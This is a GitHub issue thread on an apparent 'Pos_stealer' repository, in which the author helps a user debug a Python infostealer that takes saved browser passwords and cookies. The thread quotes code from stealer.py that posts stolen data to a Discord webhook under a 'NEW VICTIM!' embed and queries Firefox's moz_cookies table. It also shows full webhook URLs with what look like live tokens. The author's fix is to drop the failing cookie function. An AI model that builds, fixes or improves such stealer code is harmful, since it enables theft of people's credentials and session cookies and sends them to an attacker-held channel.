### ISSUE TITLE
Invalid webhook URL provided.

### ISSUE THREAD

**Issue by kenan3507** [PosHaXx/Pos_stealer#1]
Traceback (most recent call last):
  File "C:\Users\K.K\Downloads\Pos_stealer-main\Pos_stealer-main\stealer.py", line 26, in <module>
    hook = Webhook("84*******283***106") # Your webhook id
  File "C:\Users\K.K\AppData\Local\Programs\Python\Python38\lib\site-packages\dhooks\client.py", line 144, in __init__
    self._parse_or_format_url()
  File "C:\Users\K.K\AppData\Local\Programs\Python\Python38\lib\site-packages\dhooks\client.py", line 482, in _parse_or_format_url
    raise ValueError('Invalid webhook URL provided.')
ValueError: Invalid webhook URL provided.

What do you think could be the problem?

**Comment by PosHaXx** [comment]
Am.... Write full webhook url, not id

**Comment by kenan3507** [comment]
I tried with url or id. Result does not change :/

**Comment by PosHaXx** [comment]
What you write in variable hook?

For example:
`hook = Webhook("https://discord.com/api/webhooks/850271172754407425/9GJdb9CDZK2qBo5WXrKCNfsK9dPuPMceNoOdxuiHGNKvWo2xNf9U3UVhvOYkbr8okWR1")`

**Comment by kenan3507** [comment]
hook = Webhook("https://discordapp.com/api/webhooks/849069283169796106/xZwdB8-hohuI9cCsrE1nCSXoz9om9rVjv_b33axDwWI0JxdSskb1P9WIFXht0utmgT-b") # Your webhook id
embed = Embed(
    description='NEW VICTIM!',
    color=0x5CDBF0,
    timestamp='now'  
    )

**Comment by PosHaXx** [comment]
Yes, this URL is corrrect

**Comment by kenan3507** [comment]
Yes! Its works fine, thank you! Now i get this error 

Traceback (most recent call last):
  File "C:\Users\K.K\Downloads\Pos_stealer-main\Pos_stealer-main\stealer.py", line 148, in <module>
    file.write(str(Firefox()) + '\n')
  File "C:\Users\K.K\Downloads\Pos_stealer-main\Pos_stealer-main\stealer.py", line 140, in Firefox
    cursor.execute("SELECT baseDomain, value, name FROM moz_cookies")
sqlite3.OperationalError: no such column: baseDomain

Cant get any passwords or cookies

This test computer have firefox, edge and chrome saved passwords

**Comment by PosHaXx** [comment]
I saw this error, I don't know to fix this error. Remove firefox_cookies function

**Comment by kenan3507** [comment]
> I saw this error, new versions of Mozilla Firefox has new Security for cookies. I don't know to fix this. Remove firefox_cookies function

I'm sure it will get better with time! If I come across any information about it, I will write to you. Thank you for your help!
